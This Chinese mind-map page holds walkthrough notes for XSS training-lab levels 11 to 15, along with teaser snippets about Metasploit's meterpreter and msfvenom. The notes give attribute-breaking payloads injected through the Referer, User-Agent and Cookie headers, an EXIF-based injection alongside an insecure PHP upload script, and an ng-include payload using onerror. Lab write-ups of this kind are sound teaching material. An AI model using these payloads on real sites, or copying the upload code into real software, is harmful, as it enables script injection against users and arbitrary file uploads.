导图社区 4.XSS攻击例题(11~15)
4.XSS攻击例题(11~15)整理,包括第十一关到第十五关的具体解法和最后的知识点补充。希望对你有所帮助!
编辑于2022-06-28 16:43:58后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
XSS攻击
知识点补充
referer
可以看你从用什么来访问这个网站的
User-Agent
识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等
Cookie
用户登录ID,是唯一的
php exif
获取图片的各种信息,如标题、主题等
ng-include
1、ng-include 指令用于包含外部的 HTML文件。
2、包含的内容将作为指定元素的子节点。
3、ng-include 属性的值可以是一个表达式,返回一个文件名。
4、默认情况下,包含的文件需要包含在同一个域名下。
值得注意的是:
ng-include,如果单纯指定地址,必须要加引号
ng-include,加载外部html,script标签中的内容不执行
ng-include,加载外部html中含有style标签样式可以识别
onerror:备用地址
第十一关
referer
看闭合符
有四个影藏的input
?name=&t_link="type="text&t_history="type="text&t_sort="type="text&t_ref="type="text
"进行了编码
用抓包软件增加:referer:1
可以发现t_ref是可以接收数据的
referer:" type="text" oninput="alert(123)
可以发现是可以的
然后复制到代理转发
注意:oninput是输入东西才会触发
接收http_referer,<>进行替换,t_sort进行了字符编码
第十二关
User-Agent
查看闭合符
猜测t_ua应该可以注入
?keyword=&t_link="type="text&t_history="type="text&t_sort="type="text&t_ua="type="text
t_sort应该有htmlspecialchars字符编码
User-Agent: 1
User-Agent: " type="text" oninput="alert(123)
然后复制到代理转发
接收user_agent
第十三关
Cookie
看闭合符
跟上一关一样有字符编码
Cookie: user=1
Cookie: user=" type="text" oninput="alert(123)
然后复制到代理转发
接收Cookie
第十四关
exif
更改源代码
例: <html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>欢迎来到level14</title> </head> <body> <h1 align=center>欢迎来到level14</h1> <!--<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center>--> <?php echo "<center> <form action=level14.php method=POST enctype=multipart/form-data> <label for=file>文件名:</label> <input type=file name=file id=file><br> <input type=submit name=submit value=提交> </form></center>"; // 允许上传的图片后缀 $allowedExts = array("gif", "jpeg", "jpg", "png"); $temp = explode(".", $_FILES["file"]["name"]); echo $_FILES["file"]["size"]; $extension = end($temp); // 获取文件后缀名 if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/jpeg") || ($_FILES["file"]["type"] == "image/jpg") || ($_FILES["file"]["type"] == "image/pjpeg") || ($_FILES["file"]["type"] == "image/x-png") || ($_FILES["file"]["type"] == "image/png")) && ($_FILES["file"]["size"] < 2048000) // 小于 200 kb && in_array($extension, $allowedExts)) { if ($_FILES["file"]["error"] > 0) { echo "错误:: " . $_FILES["file"]["error"] . "<br>"; } else { echo "上传文件名: " . $_FILES["file"]["name"] . "<br>"; echo "文件类型: " . $_FILES["file"]["type"] . "<br>"; echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>"; echo "文件临时存储的位置: " . $_FILES["file"]["tmp_name"] . "<br>"; move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]); } } else { echo "非法的文件格式"; } $file = $_FILES["file"]["name"]; echo $file; $exif = exif_read_data($file); var_dump($exif) ?> <?php ?> <center>这关成功后不会自动跳转。成功者<a href=/level15.php?src=level15.png>点我进level15</a></center> </body> </html>
PHP开启exif
><script>alert(1)</script>
第十五关
ng-include
?src=1.txt
http://xss/level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
onerror:是当前面src地址不可用可用这个备用地址